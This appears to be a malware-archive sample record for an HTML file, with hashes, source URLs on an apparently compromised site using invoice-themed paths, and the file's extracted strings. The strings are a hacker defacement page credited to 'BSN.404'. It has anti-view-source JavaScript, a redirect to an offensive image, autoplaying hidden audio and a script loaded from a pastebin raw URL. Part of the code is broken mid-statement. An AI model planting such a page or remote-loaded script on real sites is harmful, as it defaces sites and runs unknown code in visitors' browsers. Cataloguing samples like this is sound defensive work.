Warning! We are currently in recovery mode. The complete archive is not available.

Sample details: d179de2e501dd2a61a48a80d951e2620 --

Hashes
MD5: d179de2e501dd2a61a48a80d951e2620
SHA1: 7db25f155aafd443ed5aea6f6312164607836a5f
SHA256: c692ec7359670ff4898b343abb1af4afd880184d19acb2215088ebe33d8625fc
SSDEEP: 96:3HZRVjkPukOe+8bjnYJ33TdexYzUZAvmGidzeE7w5O+:3HZRVjkT1+8bjenpeG9OF5f+
Details
File Type: HTML
Yara Hits
Source
http://setblok.com/doc/En_us/Outstanding-Invoices/
http://setblok.com/doc/En_us/Outstanding-Invoices
http://setblok.com/XzEvX-gRg_ZSAKT-tz/Southwire/ISE7275221528/US/Paid-Invoice-Credit-Card-Receipt/
Strings
		<html>
<title>BSN404 was here!!</title>
<link rel="icon"type="image/png" href="https://pngimage.net/wp-content/uploads/2018/05/bendera-indonesia-bulat-png-1.png">
<body bgcolor='black'><br>
<center>
<td align=center>
<span style='font: 45px courier;size:50px;color:red;text-shadow:white 0px 0px 15px;'>
<font size='45px' color='cyan'>
PowNed By BSN.404<br>
<center><img src="https://herlanocinan.files.wordpress.com/2013/03/cropped-me2.png" class="header-image" width="560" height="150" alt="">
<font face='Jolly Lodger' size='20' color='white'> Bekasi Security Network </font>
<font face='Jolly Lodger' size='10' color='white'> Website maintenance !! <br><font face='Jolly Lodger' size='10' color='red'> Don't Worry Admin! <br> Your security on clickNS4(e){if (document.layers||document.getElementById&&!document.all){if (e.which==2||e.which==3){alert(message);return false;}}} if (document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS4;} else if (document.all&&!document.getElementById){document.onmousedown=clickIE4;} document.oncontextmenu=new Function("alert(message);return false")</script>
<audio autoplay="autoplay" src="https://mcdn.podbean.com/mf/web/cjkgrh/SABYAN_-_SYUKRON_LILLAH.mp3" type="audio/mp3" hidden="true"></audio>
<script type='text/javascript'>
//<![CDATA[
shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="https://3.bp.blogspot.com/-H0_UqWd-vLo/WRxyOdw34WI/AAAAAAAAAf4/ljZtX0-skqYnx7Ol5PjGJvLdXRwuUrBEQCLcB/s1600/MIMPI%2BPENIS%2BKELAMIN%2BLAKI-LAKI%2BZAKAR%2B%2528Menurut%2BPrimbon%2529.png"});
</script>
<script type="text/javascript" src="https://pastebin.com/raw/ynL2hpMe"></script><link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
 <font size="6" color="white"></font><div id="Clock" align="center" style="font-size:38px;font-family:'iceland';color:white;"></div><hr width="80%">
</html>